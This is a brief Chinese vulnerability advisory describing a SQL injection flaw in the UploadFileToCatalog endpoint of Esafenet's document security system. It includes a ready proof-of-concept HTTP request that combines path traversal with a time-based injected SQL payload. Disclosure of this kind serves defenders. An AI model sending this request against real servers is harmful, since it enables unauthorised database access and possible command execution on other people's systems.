亿赛通电子文档安全系统 UploadFileToCatalog SQL注入漏洞

日期: 2024-02-20 | 影响软件: 亿赛通电子文档安全系统UploadFileToCatalog | POC: 已公开

漏洞描述

亿赛通电子文档安全系统 UploadFileToCatalog 存在SQL注入漏洞,攻击者可以获取数据库信息,特别情况下可以执行系统命令。

PoC代码

POST /CDGServer3/js/../policy/UploadFileToCatalog?fromurl=../user/dataSearch.jsp HTTP/1.1
Host: 
Content-Type: application/x-www-form-urlencoded
 
id=1';WAITFOR DELAY '0:0:3'--

相关漏洞推荐